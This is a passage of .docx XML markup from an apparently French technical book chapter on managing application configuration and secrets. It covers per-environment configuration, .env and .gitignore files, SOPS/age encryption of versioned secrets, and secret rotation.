              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fictives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1674"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Itération rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Test / intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Fictives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="167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CI</w:t>
            </w:r>
          </w:p>
        </w:tc>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Vérification automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Préproduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Copie anonymisée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1674"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation finale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Réelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="167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Restreint</w:t>
            </w:r>
          </w:p>
        </w:tc>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Clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="63" name="Picture 63"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f61.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.61 — Un artefact, plusieurs environnements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reconstruire une application pour chaque environnement annule la garantie que l'artefact testé est celui déployé. La règle est : construire une fois, configurer à l'exécution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le même artefact, deux comportements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Une image, plusieurs configurations</w:t>
        <w:br/>
        <w:t>docker run -e APP_ENV=production -e LOG_LEVEL=info mon-app:1.4.2</w:t>
        <w:br/>
        <w:t>docker run -e APP_ENV=staging   -e LOG_LEVEL=debug mon-app:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>53.3 Charger la configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est un outil de développement local, pas un mécanisme de production. Il doit être ignoré par Git et chargé explicitement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un fichier local, ignoré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.env — développement uniquement</w:t>
        <w:br/>
        <w:t>APP_ENV=development</w:t>
        <w:br/>
        <w:t>LOG_LEVEL=debug</w:t>
        <w:br/>
        <w:t>DATABASE_URL=postgres://app:app@localhost:5432/app</w:t>
        <w:br/>
        <w:t>SESSION_SECRET=dev-uniquement-ne-pas-reutiliser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un modèle versionné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.gitignore</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>.env.*</w:t>
        <w:br/>
        <w:t>!.env.example</w:t>
        <w:br/>
        <w:br/>
        <w:t># .env.example — versionné, sans valeurs sensibles</w:t>
        <w:br/>
        <w:t>APP_ENV=development</w:t>
        <w:br/>
        <w:t>LOG_LEVEL=debug</w:t>
        <w:br/>
        <w:t>DATABASE_URL=</w:t>
        <w:br/>
        <w:t>SESSION_SECRET=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux chargements explicites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Bash : refuser de démarrer si une variable manque</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:t>: "${DATABASE_URL:?DATABASE_URL non définie}"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Docker Compose : valeurs par défaut et fichier local</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  app:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      LOG_LEVEL: ${LOG_LEVEL:-info}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    env_file:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - .env.local</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UN SECRET N'EST PAS UNE VARIABLE COMME LES AUTRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les variables d'environnement sont visibles dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/proc/&lt;pid&gt;/environ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>docker inspect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et dans les journaux d'erreur. Pour un secret critique, préférez un fichier monté en lecture seule ou un coffre interrogé au démarrage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.184 — Cinq emplacements et leur exposition</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05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Emplacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Visibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable d'environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Processus, outils</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration courante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Fichier monté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Processus uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Secrets sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coffre (Vault, SOPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contrôlée et auditée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Argument de commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>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ps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, historique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Jamais</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Commit Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3053"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jamais</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>53.4 Chiffrer les secrets versionnés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Certains secrets doivent accompagner un dépôt : configuration de cluster, clés de chiffrement de disque. Le chiffrement asymétrique permet de les versionner sans les exposer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes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SOPS avec une clé age</w:t>
        <w:br/>
        <w:t>age-keygen -o key.txt</w:t>
        <w:br/>
        <w:t>export SOPS_AGE_KEY_FILE=key.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t>sops --encrypt --age age1ql3z... config.yaml &gt; config.enc.yaml</w:t>
        <w:br/>
        <w:t>sops --decrypt config.enc.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Le fichier chiffré est versionné ; la clé privée reste dans le coffre</w:t>
        <w:br/>
        <w:t>git add config.enc.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une règle par environnement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.sops.yaml — règles par chemin</w:t>
        <w:br/>
        <w:t>creation_rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - path_regex: secrets/production/.*\.yaml$</w:t>
        <w:br/>
        <w:t xml:space="preserve">    age: age1ql3z7hjy54pw3hyww5ayyfg7zqgvc7w3j2elw8zmrj2kg5sfn9aqmcac8p</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - path_regex: secrets/developpement/.*\.yaml$</w:t>
        <w:br/>
        <w:t xml:space="preserve">    age: age1developpement...</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ENVELOPPE DE CHIFFREMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Technique où une clé de données chiffre le secret, et une clé maîtresse chiffre la clé de données. La rotation de la clé maîtresse ne demande alors qu'un rechiffrement de l'enveloppe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>53.5 Faire tourner un secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un secret compromis doit être remplacé sans interruption. Une procédure de rotation préparée à l'avance transforme un incident majeur en opération courante.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Créer le nouveau secret, sans supprimer l'ancien.</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Déployer la nouvelle valeur sur les consommateurs.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Vérifier que tout fonctionne avec la nouvelle valeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Révoquer l'ancienne valeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
